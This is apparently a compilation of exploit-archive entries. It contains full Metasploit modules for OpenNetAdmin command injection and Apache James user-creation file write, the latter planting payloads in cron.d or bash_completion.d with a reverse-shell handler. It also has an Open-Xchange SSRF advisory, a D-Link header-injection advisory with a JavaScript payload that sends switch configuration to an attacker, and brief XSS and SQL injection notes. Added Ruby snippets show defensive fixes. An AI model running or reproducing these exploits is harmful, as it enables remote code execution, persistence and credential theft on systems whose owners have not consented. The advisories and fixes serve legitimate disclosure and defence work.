This Metasploit module exploits a command injection in OpenNetAdmin between versions 8.5.14 and 18.1.1.

MD5 | dd68182ff324bc4eb08a80906181e31c

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'OpenNetAdmin Ping Command Injection',
      'Description' => %q{
        This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
      },
      'Author' =>
        [
          'mattpascoe', # Vulnerability discovery and exploit
          'Onur ER' # Metasploit module
        ],
      'References' =>
        [
          ['EDB', '47691']
        ],
      'DisclosureDate' => '2019-11-19',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Privileged' => false,
      'Targets' =>
        [
          ['Automatic Target', {}]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 80,
          'payload' => 'linux/x86/meterpreter/reverse_tcp'
        },
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('VHOST', [false, 'HTTP server virtual host']),
        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
      ]
    )
    deregister_options('CMDSTAGER::FLAVOR')
  end

  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'vars_post' => {
        'xajax' => 'window_open',
        'xajaxargs[]' => 'app_about'
      }
    })

    unless res
      return CheckCode::Unknown('Connection failed')
    end

    unless res.body =~ /OpenNetAdmin/i
      return CheckCode::Safe
    end

    # The "about" window carries the version string; without it we only know
    # that OpenNetAdmin is present, not which release
    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d.]+)/).flatten.first
    unless opennetadmin_version
      return CheckCode::Detected
    end

    version = Gem::Version.new(opennetadmin_version)
    vprint_status "OpenNetAdmin version #{version}"

    if version.between?(Gem::Version.new('8.5.14'), Gem::Version.new('18.1.1'))
      return CheckCode::Appears
    end

    CheckCode::Detected
  end

  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :printf)
  end

  def execute_command(cmd, opts = {})
    begin
      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'ctype' => 'application/x-www-form-urlencoded',
        'encode_params' => false,
        'vars_post' => {
          'xajax' => 'window_submit',
          'xajaxargs[]' => ['tooltips', "ip=>;#{CGI.escape(cmd)};", 'ping']
        }
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
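The module reaches the vulnerable ping tooltip by placing shell metacharacters in the `ip` value. The Ruby below is an added defensive illustration, not OpenNetAdmin's PHP code and not part of the module: it shows the two controls that remove this bug class, a strict syntactic check that the parameter is a hostname or IP literal, and passing the value to the process as its own argv element instead of through a shell string. The helper names and the hostname regex are assumptions made for the example.

```ruby
require 'ipaddr'

# RFC 1123 hostname grammar: dot-separated labels of letters, digits and
# hyphens, at most 253 characters. Hypothetical helper, not OpenNetAdmin code.
HOSTNAME_RE = /\A(?=.{1,253}\z)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\z/i

# True only if +target+ is a hostname or a literal IPv4/IPv6 address.
# Shell metacharacters, whitespace, CIDR suffixes and bracket syntax all fail
# here, so they never reach a command line.
def valid_ping_target?(target)
  return false unless target.is_a?(String) && !target.empty?
  return false if target.match?(%r{[/\[\]]}) # IPAddr would accept "192.0.2.0/24" and "[::1]"
  return true if HOSTNAME_RE.match?(target)
  IPAddr.new(target)                          # raises on anything that is not an address
  true
rescue IPAddr::InvalidAddressError
  false
end

# Vulnerable pattern (what the injected "ip=>;cmd;" value exploits): the
# parameter is spliced into a shell command string, so ";" or "$(...)" inside
# it is parsed as shell syntax.
def ping_command_unsafe(target)
  "ping -c 1 #{target}"
end

# Hardened pattern: validate first, then hand the value to the process as one
# argv element. Process.spawn / IO.popen given an array never invoke a shell,
# so a value that somehow slipped past validation still cannot become a
# second command.
def ping_argv(target)
  raise ArgumentError, "invalid ping target: #{target.inspect}" unless valid_ping_target?(target)
  ['ping', '-c', '1', target]
end

if __FILE__ == $PROGRAM_NAME
  # 192.0.2.1 is a documentation address (RFC 5737); nothing is sent here.
  p ping_argv('192.0.2.1')
  begin
    ping_argv(';id;')
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

To actually run the probe, pass the array to `IO.popen(ping_argv(target), &:read)`; the validation error surfaces as an exception rather than as a second process.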


Open-Xchange App Suite and Documents versions 7.10.2 and below suffer from multiple server-side request forgery vulnerabilities.

MD5 | 43acfce60891d606ddbc7bb9726ef5ad

Product: OX App Suite / OX Documents
Vendor: OX Software GmbH

Internal reference: 67871, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Vulnerability Details:
The attachment API for Calendar, Tasks etc. allows defining references to e-mail attachments that should be added. This reference was not checked against a sufficient protocol and host blacklist.

Risk:
Users can trigger API calls that invoke local files or URLs. Content provided by these resources would be added as an attachment.

Steps to reproduce:
1. Create a task
2. Use the /ajax/attachment?action=attach API call and provide a URL in the datasource:
   "datasource": {
     "identifier": "com.openexchange.url.mail.attachment",
     "url": "file:///var/file"
   }

Solution:
We have implemented a protocol and host blacklist to avoid invoking any file-system references and local addresses.



---



Internal reference: 67874 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
Researcher Credits: chbi
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The RSS feature allows adding arbitrary data sources. To avoid exposing confidential data we implemented a host blacklist and protocol whitelist. Due to an error the host blacklist was not checked if the protocol passed the whitelist.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be reached, a different error is returned than for unavailable hosts. This can be used to discover the internal network topology and services.

Steps to reproduce:
1. Create an RSS feed
2. Use http://127.0.0.1.nip.io:80/test.xml as RSS feed
3. Monitor the response code

Solution:
We fixed the blacklist evaluation and avoid access to blacklisted hosts regardless of the port evaluation. Please consider adjusting com.openexchange.messaging.rss.feed.blacklist to your network layout.



---



Internal reference: 67931, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-04
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The snippets API allows adding arbitrary data sources. This reference was not checked against a sufficient protocol and host blacklist.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be reached, a different error is returned than for unavailable hosts. This can be used to discover the internal network topology, services and files.

Steps to reproduce:
1. Create a snippet with HTML content
2. Include a reference to an internal host/service
3. Monitor the response code

Solution:
We implemented a protocol and host blacklist to avoid invoking any file-system references and local addresses.



---



Internal reference: 67980 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-05
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The mail accounts feature allows adding arbitrary data sources. To avoid exposing confidential data we implemented a host blacklist and protocol whitelist. Due to an error the host blacklist was not checked if the protocol passed the whitelist.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be reached, a different error is returned than for unavailable hosts. This can be used to discover the internal network topology and services.

Steps to reproduce:
1. Create a mail account
2. Use 127.0.0.1:143 as IMAP server
3. Monitor the network socket

Solution:
We fixed the blacklist evaluation and avoid access to blacklisted hosts regardless of the port evaluation. Please consider adjusting com.openexchange.mail.account.blacklist to your network layout.



---



Internal reference: 67983 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2
Vulnerable component: office
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev4
Vendor notification: 2019-11-05
Solution date: 2019-12-09
Public disclosure: 2020-02-19
Researcher Credits: chbi
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
Recent versions of OX Documents allow inserting images from URL sources. Since no sufficient blacklist was in place, the server could be made to request arbitrary image resources on the user's behalf.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be reached, a different error is returned than for unavailable hosts. This can be used to discover the internal network topology and services.

Steps to reproduce:
1. Create an OX Documents document
2. Insert an image from URL and specify a local address, like http://127.0.0.1/test.jpg
3. Monitor the response code

Solution:
We implemented a host blacklist to avoid invoking any local addresses and operator-defined network blocks. Please consider adjusting com.openexchange.office.upload.blacklist to your network layout.



---



Internal reference: 68252 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: readerengine
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev10, 7.10.1-rev5, 7.10.2-rev6
Vendor notification: 2019-11-15
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The documentconverter can be used to fetch "remote" URLs and return them as images. The source of those URLs was not checked against a blacklist.

Risk:
Local resources like images or websites could be invoked by end-users and expose their content through the generated image.

Steps to reproduce:
1. Create a document and insert an image "from URL"
2. Enter a URL that redirects to the local documentconverter instance which again contains a reference to a local resource
http%3A//localhost%3A8008/documentconverterws%3Faction%3Dconvert%26url%3Dhttp%253A//localhost/%26targetformat%3Dpng

Solution:
We now reject redirects and check provided URLs against blacklists and protocol whitelists.
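Every SSRF entry above describes the same pair of controls, a protocol whitelist and a host blacklist, and two of them the same defect: the blacklist was skipped once the protocol had passed. The Ruby below is an added illustration of that policy and is not Open-Xchange code; the function names, the CIDR list and the FAKE_DNS table are constructed for the example (127.0.0.1.nip.io is the hostname from the RSS entry; the other names are made up). It also goes one step beyond the advisories' wording: a hostname is judged by the addresses it resolves to, because a blacklist of spellings alone does not catch DNS names that point at loopback or RFC 1918 space.

```ruby
require 'uri'
require 'ipaddr'

# Scheme whitelist: plain web fetches only, never file:, ftp:, gopher: ...
ALLOWED_SCHEMES = %w[http https].freeze

# Address ranges a server-side fetch must never reach: "this host", loopback,
# RFC 1918, link-local (which is where cloud metadata endpoints live), and the
# IPv6 loopback, unique-local and link-local blocks. Constructed for the example.
BLOCKED_RANGES = %w[
  0.0.0.0/8 127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16
  ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

# Constructed DNS table so the example runs offline. A real deployment would
# pass a resolver that returns the A/AAAA records for the name.
FAKE_DNS = {
  'feeds.example'    => ['203.0.113.10'],
  '127.0.0.1.nip.io' => ['127.0.0.1'],              # hostname from the RSS advisory
  'intranet.corp'    => ['10.20.30.40'],
  'dual.example'     => ['203.0.113.20', '192.168.1.5'] # one public, one private record
}.freeze

def ip_literal?(host)
  IPAddr.new(host)
  true
rescue IPAddr::InvalidAddressError
  false
end

def blocked_ip?(ip)
  addr = IPAddr.new(ip)
  BLOCKED_RANGES.any? { |range| range.include?(addr) }
end

# The evaluation-order bug the advisories describe: the early return after the
# scheme check means the host blacklist is never consulted for http(s) URLs.
def fetch_allowed_buggy?(url, host_blacklist)
  uri = URI.parse(url)
  return true if ALLOWED_SCHEMES.include?(uri.scheme) # bug: returns before the host check
  return false if host_blacklist.include?(uri.hostname)
  false
rescue URI::Error
  false
end

# Corrected policy. Every control is applied, and the host is judged by what it
# resolves to rather than by its spelling. Unresolvable names and names with
# even one internal record fail closed.
def fetch_allowed?(url, host_blacklist, resolver: FAKE_DNS)
  uri = URI.parse(url)
  return false unless ALLOWED_SCHEMES.include?(uri.scheme)
  host = uri.hostname.to_s.downcase
  return false if host.empty? || host == 'localhost' || host_blacklist.include?(host)
  return !blocked_ip?(host) if ip_literal?(host)   # literal address in the URL
  ips = resolver[host]
  return false if ips.nil? || ips.empty?
  ips.none? { |ip| blocked_ip?(ip) }
rescue URI::Error
  false
end
```

Redirects are the remaining hole: a permitted URL can answer with a 302 to a forbidden one, which is why the documentconverter fix above rejects them outright. If redirects must be followed, run `fetch_allowed?` again on every Location value, with the same resolver, before issuing the next request, and connect to the address that passed the check rather than resolving the name a second time.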



---



Internal reference: 68136 (Bug ID)
Vulnerability type: Missing escaping (CWE-116)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: readerengine
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev6, 7.10.1-rev4, 7.10.2-rev3
Vendor notification: 2019-11-11
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-9853 (LibreOffice)
CVSS: 7.8 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Vulnerability Details:
We have backported recent updates of LibreOffice, which is used by readerengine. This fixes potential vulnerabilities that are not directly related to readerengine itself.

Risk:
Existing vulnerabilities in upstream projects could be used in the context of OX App Suite / OX Documents. This is a precautionary update.

Steps to reproduce:
1. n/a

Solution:
n/a


D-Link DGS-1250 suffers from a header injection vulnerability that can be leveraged through cross site scripting.

MD5 | 56529bffd14f3b239cc24f418e85ace4

D-Link DGS-1250 header injection vulnerability
==============================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/d-link-dgs-1250-header-injection.txt


Overview
--------

D-Link DGS-1250 switch is susceptible to a header injection vulnerability enabling an
attacker to steal the switch configuration.


Description
-----------

D-Link DGS-1250 switch web user interface fails to sanitize certain form parameters
for malicious input. The attacker is able to inject arbitrary headers to the HTTP
response, bypassing browser Cross-Origin protection.


Impact
------

Malicious external JavaScript can exfiltrate the D-Link DGS-1250 switch configuration.
The configuration includes admin credentials with plain text passwords among other
confidential information.


Details
-------

The discovered vulnerability, described in more detail below, enables the attack
described here in brief.

1. The attacker creates a malicious JavaScript payload. The payload will have code
to exploit the vulnerability to exfiltrate the switch configuration (*):

    var xhr = new XMLHttpRequest();
    xhr.open("POST", location.protocol + "//10.90.90.90/BinFile/config.cfg", false);
    xhr.withCredentials = true;
    xhr.send("hidunit_id=1&hidfile_type=2&hidoption_type=0&hidsrc_file=Config1&" +
             "hidfile_name=config.txt%0a" +
             "Access-Control-Allow-Credentials: true%0a" +
             "Access-Control-Allow-Origin: " + window.location.origin);
    if (xhr.status === 200) {
      // send xhr.responseText to the attacker
    }

2. The attacker adds the JavaScript payload to web site(s) and lures the logged in
administrator to visit the site, either by mass spamming or by targeted
phishing.

3. As soon as the logged in administrator visits the malicious site with the
JavaScript payload, the full switch configuration is sent to the attacker.


*) The example payload uses a fixed default IP address. Real world attack could be
smarter in this regard: it could attempt to determine the client's internal IP
address by leveraging WebRTC. Once the client IP address is identified the attack
would attempt to fetch an image URL from the web user interface. Successful image
loading would indicate that the switch is found.


Vulnerabilities
---------------

1. CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers

`/BinFile/config.cfg' fails to neutralize CRLF sequences in `hidfile_name' parameter.
Thus it is possible to include additional headers to the HTTP response, such as CORS
(Cross-Origin Resource Sharing) headers "Access-Control-Allow-Credentials" and
"Access-Control-Allow-Origin". Successful injection enables a third-party web site
to receive the POST response (config file).


Proof-of-Concept
----------------

For devices without SSL configured:
http://sintonen.fi/advisories/d-link-dgs-1250-header-injection-poc.html

For devices with SSL configured:
https://sintonen.fi/advisories/d-link-dgs-1250-header-injection-poc.html

The PoC expects the switch to use the default IP address 10.90.90.90.


Vulnerable versions
-------------------

The following D-Link DGS-1250 firmware versions are known to be vulnerable:
- Build 1.00.040
- Build 2.01.006

Older versions are likely vulnerable as well, but were not tested. Other D-Link
models could be affected as well.


Impact of the SameSite cookie attribute
---------------------------------------

Browsers that implement the SameSite cookie attribute and default it to "Lax" mode
will automatically mitigate this vulnerability. At least Chrome and Firefox are
likely to switch to defaulting to Lax mode sometime in 2020.


Vendor recommendations
----------------------

1. Sanitize input that ends up in the HTTP response headers. In particular, do not
   pass line feed and carriage return characters (ASCII 10 and 13) through as-is.
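As an added example of recommendation 1 (not D-Link firmware code; the function names and the Content-Disposition use are hypothetical), the Ruby below applies two layers: a positive filter on the file name, and an assertion at the point where the header is emitted so that any future code path bypassing the filter still cannot break the header. A third function gives the request-side view a WAF or log review would take, flagging a parameter that carries a raw or percent-encoded line break.

```ruby
require 'uri'

# Refuse to emit a header whose value carries CR, LF or NUL: any of those
# lets the client parse the remainder of the value as further headers.
def assert_header_safe!(name, value)
  if value.match?(/[\r\n\x00]/)
    raise ArgumentError, "refusing to emit header #{name}: control characters in value"
  end
  value
end

# Positive filter for a user-supplied download name: keep a conservative
# character set and never return an empty or dots-only name.
def sanitize_filename(name)
  cleaned = name.to_s.gsub(/[^A-Za-z0-9._-]/, '_')
  cleaned = 'download' if cleaned.delete('.').empty?
  cleaned
end

# Content-Disposition value for a config download (hypothetical use of the
# hidfile_name parameter). The filter makes injection impossible; the
# assertion catches a caller that forgot the filter.
def content_disposition(filename)
  assert_header_safe!('Content-Disposition', "attachment; filename=\"#{sanitize_filename(filename)}\"")
end

# Detection-side check: does a form parameter contain a line break, raw or
# URL-encoded (%0a / %0d), before it ever reaches a header? Malformed
# percent-encoding is treated as suspicious rather than ignored.
def header_injection_attempt?(param_value)
  decoded = URI.decode_www_form_component(param_value.to_s)
  decoded.match?(/[\r\n]/)
rescue ArgumentError
  true
end
```

The filter is deliberately stricter than "remove CR and LF": a value such as `config.txt%0aAccess-Control-Allow-Origin: *` also carries a colon and a space, and reducing the alphabet to file-name characters removes the whole class rather than the two bytes the advisory names.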


End user mitigation
-------------------

1. Use a dedicated browser session to access the web user interface.


Credits
-------

The vulnerability was discovered by Harry Sintonen / F-Secure Consulting.


Timeline
--------

2019.12.18 initial discovery of the vulnerability
2019.12.18 reported the vulnerability to D-Link via Report Vulnerabilities form
2019.12.19 received vendor acknowledgement
2020.01.08 requested status update from the vendor contact
2020.01.10 added section about impact of the SameSite cookie attribute
2020.02.11 sent a reminder to the vendor contact of the default 60 day disclosure
policy
2020.02.19 public disclosure



Online Birth Certificate System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | d74f46d5ff00bd79b6623218f49f35b1

# Exploit Title: Online Birth Certificate System 1.0 Stored Cross-Site Scripting Vulnerability
# Date: 2020-02-21
# Exploit Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Software: Online Birth Certificate System
# Version: 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on: Windows 10
# This application is vulnerable to a stored XSS vulnerability. This


# Vulnerable script: http://localhost/obcs/user/fill-birthregform.php
# Vulnerable parameters: 'Place of Birth', 'Full Name of Father', 'Permanent Address', 'Postal Address'
# Payload used: alert('document.cookie')
# POC: When you view the details under the Manage Details tab
# you will see your JavaScript code execute.


Thanks and Regards, Priyanka Samak


AMSS++ version 4.31 suffers from a remote SQL injection vulnerability.

MD5 | 7a2f4c394576c72f47569db0d159cb4f

====================================================================================================================================
| # Title : AMSS++ v 4.31 Sql Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar |
| # Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engines.

[+] Use payload : /modules/mail/main/maildetail.php?id=174

[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here


Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================


This Metasploit module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory. To use this module with the cron exploitation method, run the exploit using the given payload, host, and port. After running the exploit, the payload will be executed within 60 seconds. Due to differences in how cron may run in certain Linux operating systems such as Ubuntu, it may be preferable to set the target to Bash Completion as the cron method may not work. If the target is set to Bash completion, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. For this exploitation method, bash completion must be enabled to gain code execution. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.

MD5 | 3d2e5a1c98fb29c02aab67ae9f098b24

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
      'Description' => %q{
        This module exploits a vulnerability that exists due to a lack of input
        validation when creating a user. Messages for a given user are stored
        in a directory partially defined by the username. By creating a user
        with a directory traversal payload as the username, commands can be
        written to a given directory. To use this module with the cron
        exploitation method, run the exploit using the given payload, host, and
        port. After running the exploit, the payload will be executed within 60
        seconds. Due to differences in how cron may run in certain Linux
        operating systems such as Ubuntu, it may be preferable to set the
        target to Bash Completion as the cron method may not work. If the target
        is set to Bash completion, start a listener using the given payload,
        host, and port before running the exploit. After running the exploit,
        the payload will be executed when a user logs into the system. For this
        exploitation method, bash completion must be enabled to gain code
        execution. This exploitation method will leave an Apache James mail
        object artifact in the /etc/bash_completion.d directory and the
        malicious user account.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Palaczynski Jakub', # Discovery
        'Matthew Aberegg', # Metasploit
        'Michael Burkey' # Metasploit
      ],
      'References' =>
        [
          [ 'CVE', '2015-7611' ],
          [ 'EDB', '35513' ],
          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
        ],
      'Platform' => 'linux',
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Targets' =>
        [
          [ 'Bash Completion', {
            'ExploitPath' => 'bash_completion.d',
            'ExploitPrepend' => '',
            'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
          } ],
          [ 'Cron', {
            'ExploitPath' => 'cron.d',
            'ExploitPrepend' => '* * * * * root ',
            'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
          } ]
        ],
      'Privileged' => true,
      'DisclosureDate' => "Oct 1 2015",
      'DefaultTarget' => 1,
      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
    ))
    register_options(
      [
        OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
        OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
        OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
        OptString.new('POP3PORT', [ false, 'Port for POP3 Apache James Service', '110' ]),
        Opt::RPORT(25)
      ])
    import_target_defaults
  end

  def check
    # SMTP service check
    connect
    smtp_banner = sock.get_once
    disconnect
    unless smtp_banner.to_s.include? "JAMES SMTP Server"
      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
    end

    # James Remote Administration Tool service check
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
    admin_banner = sock.get_once
    disconnect
    unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
    end

    # Get version number
    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d.]+)/).flatten.first
    # Null check
    unless version
      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
    end
    # Create version objects
    target_version = Gem::Version.new(version)
    vulnerable_version = Gem::Version.new("2.3.2")

    # Check version number
    if target_version > vulnerable_version
      return CheckCode::Safe
    elsif target_version == vulnerable_version
      return CheckCode::Appears
    elsif target_version < vulnerable_version
      return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
    end
  end

  def execute_james_admin_tool_command(cmd)
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
    sock.get_once
    sock.puts(username + "\n")
    sock.get_once
    sock.puts(password + "\n")
    sock.get_once
    sock.puts(cmd)
    sock.get_once
    sock.puts("quit\n")
    disconnect
  end

  def cleanup
    return unless target['ExploitPath'] == "cron.d"
    # Delete mail objects containing payload from cron.d
    username = "../../../../../../../../etc/cron.d"
    password = @account_password
    begin
      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
      sock.get_once
      sock.puts("USER #{username}\r\n")
      sock.get_once
      sock.puts("PASS #{password}\r\n")
      sock.get_once
      sock.puts("dele 1\r\n")
      sock.get_once
      sock.puts("quit\r\n")
      disconnect
    rescue
      print_bad("Failed to remove payload message for user '#{username}' with password '#{@account_password}'")
    end

    # Delete malicious user
    delete_user_command = "deluser #{username}\n"
    execute_james_admin_tool_command(delete_user_command)
  end

  def execute_command(cmd, opts = {})
    # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
    exploit_path = target['ExploitPath']
    @account_password = Rex::Text.rand_text_alpha(8..12)
    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"
    execute_james_admin_tool_command(add_user_command)

    # Send payload via SMTP
    payload_prepend = target['ExploitPrepend']
    connect
    sock.puts("ehlo admin@apache.com\r\n")
    sock.get_once
    sock.puts("mail from: \r\n")
    sock.get_once
    sock.puts("rcpt to: \r\n")
    sock.get_once
    sock.puts("data\r\n")
    sock.get_once
    sock.puts("From: admin@apache.com\r\n")
    sock.puts("\r\n")
    sock.puts("'\n")
    sock.puts("#{payload_prepend}#{cmd}\n")
    sock.puts("\r\n.\r\n")
    sock.get_once
    sock.puts("quit\r\n")
    sock.get_once
    disconnect
  end

  def execute_cmdstager_end(opts)
    if target['ExploitPath'] == "cron.d"
      print_status("Waiting for cron to execute payload...")
    else
      print_status("Payload will be triggered when someone logs onto the target")
      print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
    end
  end

  def exploit
    execute_cmdstager(background: true)
  end

end
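The root cause the module relies on is a user name that is joined into a filesystem path without validation. The Ruby below is an added defensive example, not Apache James code (the spool layout, the allow-list and the function names are assumptions): it shows the two independent layers that close this bug, an allow-list on the name and a containment check on the normalised path, and why the second layer is worth having even when the first exists.

```ruby
# Allow-list for mailbox user names: a local-part of letters, digits, dot,
# underscore and hyphen, starting with a letter or digit. Slashes,
# backslashes and NUL can never appear, and ".." is refused explicitly.
USERNAME_RE = /\A[a-z0-9][a-z0-9._-]{0,63}\z/i

def valid_username?(name)
  name.is_a?(String) && USERNAME_RE.match?(name) && !name.include?('..')
end

# Absolute mailbox directory for +username+ under +spool_root+ (hypothetical
# layout: one directory per user). Layer one is the allow-list; layer two
# normalises the joined path and verifies it still lies inside the root, so a
# gap in layer one, or a caller that skips it (check_name: false), still cannot
# produce a directory such as /etc/cron.d.
def mailbox_dir(spool_root, username, check_name: true)
  if check_name && !valid_username?(username)
    raise ArgumentError, "invalid username #{username.inspect}"
  end
  root = File.expand_path(spool_root)
  dir  = File.expand_path(File.join(root, username.to_s))
  unless dir.start_with?(root + File::SEPARATOR)
    raise ArgumentError, "mailbox path #{dir} escapes #{root}"
  end
  dir
end

if __FILE__ == $PROGRAM_NAME
  puts mailbox_dir('/var/mail/spool', 'alice')
  [ '../../../../../../../../etc/cron.d', 'bob/../../etc', '.hidden' ].each do |name|
    begin
      mailbox_dir('/var/mail/spool', name)
    rescue ArgumentError => e
      puts "rejected: #{e.message}"
    end
  end
end
```

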